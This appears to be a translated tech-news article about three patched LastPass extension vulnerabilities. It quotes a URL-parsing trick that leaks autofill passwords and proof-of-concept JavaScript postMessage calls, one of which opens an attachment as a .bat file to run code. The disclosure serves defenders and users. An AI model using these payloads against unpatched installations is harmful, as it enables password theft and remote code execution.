Choosing a password manager is not an easy task. Other than Notepad with text file encryption, there is no clear leader in this area. The fundamental question is: is it safe to use cloud services or is it fundamentally stored passwords only locally? Someone believes that the use of cloud services still increases the risks. And here came another argument in this dispute. The LastPass password manager just closed three vulnerabilities ( one for expansion under Chrome, two for extension under Firefox), which allowed the malicious website to directly extract LastPass passwords. As usual, the cause of the vulnerability is a programmers error.

What kind of password manager is better now? Maybe go back to the "Notebook"?

The corporate blog LastPass reported that they were informed about the vulnerabilities by security specialist Tavis Ormandi (surprisingly, the same people find the lion's share of all the bugs in the popular software) from the Google Project Zero hacker team.
')
LastPass says that it did not notice the theft of user passwords and advises to upgrade to the latest versions of the extension, where this vulnerability is closed, if they have not yet been updated automatically:

• Firefox 4.1.36
• Chrome: 4.1.43
• Edge: 4.1.30
• Opera: 4.1.28

Suppose that the password theft really did not happen. But how exactly could attackers make such a theft?

The first vulnerability (Firefox 3.3.2 message-hijacking) for the old extension branch under Firefox exploits the URL parsing scheme in 3.3.2, which allowed the malicious website to impersonate a legitimate website and thus force LastPass to provide credentials. Information about this bug came in LastPass last year - in July, the vulnerability was closed, but only for the new 4.X branch, and it was simply forgotten to be transferred to the 3.X branch.

Last year, security specialist Mathias Karlsson spoke in detail about this shameful bug with URL parser in LastPass.

Here is what the parser looked like (the lpParseUri function in the LastPass extension):

var fixedURL = URL.match(/^(.*:\/\/[^\/]+\/.*)@/); fixedURL && (url = url.substring(0, fixedURL[1].length) + url.substring(fixedURL[1].length).replace(/@/g, "%40")); 

Such “doggie” treatment means that the URL of the http://avlidienbrunn.se/@twitter.com/@hehe.php type was perceived by the browser as an address on the domain avlidienbrunn.se , and the LastPass extension was perceived as the address twitter.com/@hehe.php . Accordingly, the auto-complete function transferred the password for the domain twitter.com to the domain avlidienbrunn.se .

This vulnerability was closed a year ago in the actual branch of LastPass, everyone laughed and forgot. Now it turned out that in the 3.X branch still remained. LastPass developers explain that the branch was formally closed back in April, that is, nobody was engaged in its support. And if there are still users of old versions, they are strongly recommended to switch to 4.1.36.

Second bug

The second vulnerability, which LastPass closed yesterday, is already fresh. And it affects not only versions for Firefox, but also versions for Chrome and Edge. Like the last bug, here the malicious site can impersonate itself and get a password. Moreover, in the case of using the LastPass binary component, it was even possible to execute the code remotely, which is completely unacceptable.

In a Chromium bug tracker report, Tavis Ormandi explained that the problem is in the script websiteConnector.js, which is used only on the 1min-ui-prod.service.lastpass.com domain. Here it is listed in the manifest:

 { "matches": [ "https://1min-ui-prod.service.lastpass.com/*" ], "js": [ "1minsignup/chrome/websiteConnector.js" ], "all_frames": true, "run_at": "document_end" }, 

Script content:

 $ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js ... window.addEventListener("message", function(e) { e.data.fromExtension || chrome.runtime.sendMessage(e.data, function(e) {}); }); 

Passing unauthenticated window objects into an extension from the websiteConnector.js script allows anyone to use this function:

 win = window.open("https://1min-ui-prod.service.lastpass.com/"); win.postMessage({}, "*"); 

And get access to all the internal LastPass RPC commands. There are hundreds of calls, including the transfer of passwords. When using the LastPass binary component, you can even run arbitrary code:

 win = window.open("https://1min-ui-prod.service.lastpass.com/"); win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*"); 

The closed bug in the extension for Chrome coincides with one of the closed bugs in the extension for Firefox, only there it was necessary to make some additions.

As Mathias Karlsson said last year, finding such vulnerabilities is not a reason to abandon password managers.

By the way, Microsoft has not yet approved a new version of the extension for Edge. It seems that LastPass users can still be exploited on this browser.